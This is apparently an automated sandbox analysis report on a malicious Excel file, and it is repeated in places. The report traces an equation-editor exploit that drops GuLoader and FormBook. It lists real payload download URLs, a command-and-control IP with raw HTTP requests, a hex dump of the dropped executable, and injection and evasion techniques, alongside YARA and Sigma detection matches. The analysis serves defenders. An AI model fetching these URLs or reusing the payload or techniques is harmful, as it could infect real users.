Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Unique food order.xlsx

Overview

General Information

Sample Name:Unique food order.xlsx
Analysis ID:320235
MD5:f2cd263042fce1a4c2cbeed5f1676429
SHA1:608334d6c55e50f3447f865bca59e05b7b60e0cb
SHA256:f2f88e0287d17638c5d902a49d19b2c4e989dc2a511411ce959c91b642fb9359
Tags:VelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1552 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2408 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2692 cmdline: 'C:\Users\Public\vbc.exe' MD5: C05EEE88F0B57E853996957D6523397B)
      • vbc.exe (PID: 2868 cmdline: 'C:\Users\Public\vbc.exe' MD5: C05EEE88F0B57E853996957D6523397B)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • autoconv.exe (PID: 1664 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 09D786401F6CA6AEB16B2811B169F944)
          • NAPSTAT.EXE (PID: 1840 cmdline: C:\Windows\SysWOW64\NAPSTAT.EXE MD5: 4AF92E1821D96E4178732FC04D8FD69C)
            • cmd.exe (PID: 2168 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 10 entries

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2408, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2692
      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.125.191.5, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2408, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
      Sigma detected: File Dropped By EQNEDT32EXEShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2408, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
      Sigma detected: Executables Started in Suspicious FolderShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2408, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2692
      Sigma detected: Execution in Non-Executable FolderShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2408, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2692
      Sigma detected: Suspicious Program Location Process StartsShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2408, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2692

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Antivirus detection for URL or domainShow sources
      Source: http://wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu/worksdoc/svchost.exeAvira URL Cloud: Label: malware
      Source: http://wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu/worksdoc/svchost.exeAvira URL Cloud: Label: malware
      Multi AV Scanner detection for submitted fileShow sources
      Source: Unique food order.xlsxVirustotal: Detection: 24%Perma Link
      Source: Unique food order.xlsxReversingLabs: Detection: 22%
      Source: Unique food order.xlsxVirustotal: Detection: 24%Perma Link
      Source: Unique food order.xlsxReversingLabs: Detection: 22%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY

      Exploits:

      barindex
      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 4x nop then pop esi
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 4x nop then pop esi
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 4x nop then pop esi
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 4x nop then pop esi
      Source: global trafficDNS query: name: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu
      Source: global trafficDNS query: name: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.125.191.5:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.125.191.5:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.125.191.5:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.125.191.5:80

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49165 -> 103.125.191.5:80
      Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.22:49166 -> 103.125.191.5:80
      Source: TrafficSnort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49165 -> 103.125.191.5:80
      Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.22:49166 -> 103.125.191.5:80
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Nov 2020 06:43:17 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Wed, 18 Nov 2020 21:48:32 GMTETag: "f000-5b4689298b6b3"Accept-Ranges: bytesContent-Length: 61440Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 69 c6 c2 93 08 a8 91 93 08 a8 91 93 08 a8 91 10 14 a6 91 92 08 a8 91 dc 2a a1 91 9b 08 a8 91 a5 2e a5 91 92 08 a8 91 52 69 63 68 93 08 a8 91 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8a a6 b8 50 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 c0 00 00 00 30 00 00 00 00 00 00 18 12 00 00 00 10 00 00 00 d0 00 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 01 00 00 10 00 00 e9 b7 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 c3 00 00 3c 00 00 00 00 f0 00 00 f8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 00 30 00 00 00 00 10 00 00 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 b6 00 00 00 10 00 00 00 c0 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 bc 13 00 00 00 d0 00 00 00 10 00 00 00 d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 08 00 00 00 f0 00 00 00 10 00 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 ee 5b 23 58 18 00 00 00 c3 1f b0 49 23 00 00 00 00 00 00 00 00 00 00 00 55 53 45 52 33 32 2e 44 4c 4c 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Nov 2020 06:43:17 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Wed, 18 Nov 2020 21:48:32 GMTETag: "f000-5b4689298b6b3"Accept-Ranges: bytesContent-Length: 61440Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 69 c6 c2 93 08 a8 91 93 08 a8 91 93 08 a8 91 10 14 a6 91 92 08 a8 91 dc 2a a1 91 9b 08 a8 91 a5 2e a5 91 92 08 a8 91 52 69 63 68 93 08 a8 91 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8a a6 b8 50 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 c0 00 00 00 30 00 00 00 00 00 00 18 12 00 00 00 10 00 00 00 d0 00 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 01 00 00 10 00 00 e9 b7 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 c3 00 00 3c 00 00 00 00 f0 00 00 f8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 00 30 00 00 00 00 10 00 00 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 b6 00 00 00 10 00 00 00 c0 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 bc 13 00 00 00 d0 00 00 00 10 00 00 00 d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 08 00 00 00 f0 00 00 00 10 00 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 ee 5b 23 58 18 00 00 00 c3 1f b0 49 23 00 00 00 00 00 00 00 00 00 00 00 55 53 45 52 33 32 2e 44 4c 4c 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
      Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
      Source: global trafficHTTP traffic detected: GET /worksdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.euConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /bin_xMjelaYnr43.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.125.191.5Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /worksdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.euConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /bin_xMjelaYnr43.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.125.191.5Cache-Control: no-cache
      Source: C:\Users\Public\vbc.exeCode function: 5_2_001B5F9F InternetReadFile,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_001B5F9F InternetReadFile,
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to behavior
      Source: global trafficHTTP traffic detected: GET /worksdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.euConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /bin_xMjelaYnr43.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.125.191.5Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /worksdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.euConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /bin_xMjelaYnr43.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.125.191.5Cache-Control: no-cache
      Source: vbc.exe, 00000005.00000002.2360648319.000000000080B000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com86f equals www.linkedin.com (Linkedin)
      Source: vbc.exe, 00000005.00000002.2360648319.000000000080B000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
      Source: vbc.exe, 00000005.00000002.2360648319.000000000080B000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com86f equals www.linkedin.com (Linkedin)
      Source: vbc.exe, 00000005.00000002.2360648319.000000000080B000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
      Source: unknownDNS traffic detected: queries for: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu
      Source: unknownDNS traffic detected: queries for: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu
      Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
      Source: vbc.exeString found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.bin
      Source: vbc.exe, 00000005.00000002.2360659510.000000000081B000.00000004.00000020.sdmpString found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.binY~f
      Source: vbc.exe, 00000005.00000002.2360659510.000000000081B000.00000004.00000020.sdmpString found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.binq~f
      Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
      Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: vbc.exe, 00000005.00000002.2364793051.000000001E1A0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.2332755468.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
      Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
      Source: vbc.exe, 00000005.00000002.2364793051.000000001E1A0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.2332755468.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
      Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: explorer.exe, 00000007.00000000.2337234886.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
      Source: explorer.exe, 00000007.00000000.2332531261.0000000000260000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
      Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
      Source: vbc.exeString found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.bin
      Source: vbc.exe, 00000005.00000002.2360659510.000000000081B000.00000004.00000020.sdmpString found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.binY~f
      Source: vbc.exe, 00000005.00000002.2360659510.000000000081B000.00000004.00000020.sdmpString found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.binq~f
      Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
      Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
